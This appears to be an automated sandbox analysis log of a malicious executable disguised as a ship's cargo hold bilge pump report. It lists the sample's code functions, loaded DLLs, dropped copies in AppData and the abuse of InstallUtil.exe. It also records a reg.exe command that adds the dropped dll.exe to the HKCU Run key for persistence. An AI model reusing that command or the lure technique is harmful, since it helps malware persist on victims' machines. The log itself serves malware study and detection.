Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_07375DF0	0_2_07375DF0
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_07341C4F	0_2_07341C4F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_013452F8	14_2_013452F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_01347898	14_2_01347898
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E1A248	14_2_02E1A248
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E14FE9	14_2_02E14FE9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E12CE8	14_2_02E12CE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E14450	14_2_02E14450
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E180A9	14_2_02E180A9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E1E870	14_2_02E1E870
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E10040	14_2_02E10040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E10012	14_2_02E10012
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E1F6F0	14_2_02E1F6F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E17EA0	14_2_02E17EA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E17EB0	14_2_02E17EB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E13618	14_2_02E13618
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E12F88	14_2_02E12F88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E17713	14_2_02E17713
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E16CE0	14_2_02E16CE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E16CF0	14_2_02E16CF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E12CCD	14_2_02E12CCD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E13C80	14_2_02E13C80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E14441	14_2_02E14441
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E185E0	14_2_02E185E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E13581	14_2_02E13581
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_054E5034	14_2_054E5034
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_054E7240	14_2_054E7240
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_054E7230	14_2_054E7230
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_06202A78	14_2_06202A78
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0620AD60	14_2_0620AD60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_06202A58	14_2_06202A58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0620C968	14_2_0620C968
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07911C68	14_2_07911C68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791DB90	14_2_0791DB90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791DB81	14_2_0791DB81
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791E788	14_2_0791E788
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791E778	14_2_0791E778
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791EA78	14_2_0791EA78
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791EDF8	14_2_0791EDF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791EDE8	14_2_0791EDE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791D97D	14_2_0791D97D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791F030	14_2_0791F030
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791F022	14_2_0791F022
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791F450	14_2_0791F450
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0791F460	14_2_0791F460
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798E37A	14_2_0798E37A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798F288	14_2_0798F288
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798D280	14_2_0798D280
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798561B	14_2_0798561B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798B670	14_2_0798B670
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798D9AA	14_2_0798D9AA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798DEBE	14_2_0798DEBE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798C63F	14_2_0798C63F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0798D25A	14_2_0798D25A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07982E45	14_2_07982E45
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07982E78	14_2_07982E78
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07D628C8	14_2_07D628C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07D6D30F	14_2_07D6D30F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07D6D320	14_2_07D6D320
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07911C4F	14_2_07911C4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_0195E0C1	16_2_0195E0C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_0195E750	16_2_0195E750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_0195A900	16_2_0195A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_01954AD0	16_2_01954AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_0195EFD8	16_2_0195EFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_01953EB8	16_2_01953EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_01954200	16_2_01954200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06629850	16_2_06629850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06635648	16_2_06635648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_066366B0	16_2_066366B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06632418	16_2_06632418
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_0663C230	16_2_0663C230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06637E48	16_2_06637E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06637768	16_2_06637768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_0663E440	16_2_0663E440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06630040	16_2_06630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06635DB0	16_2_06635DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_0663003B	16_2_0663003B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06630007	16_2_06630007

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.000000000388E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046079068.00000000050C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamee6c601b8-7fc8-4bfc-9d80-fcae17cccaab.exe4 vs SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2043322348.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamee6c601b8-7fc8-4bfc-9d80-fcae17cccaab.exe4 vs SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptbase.dll

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"

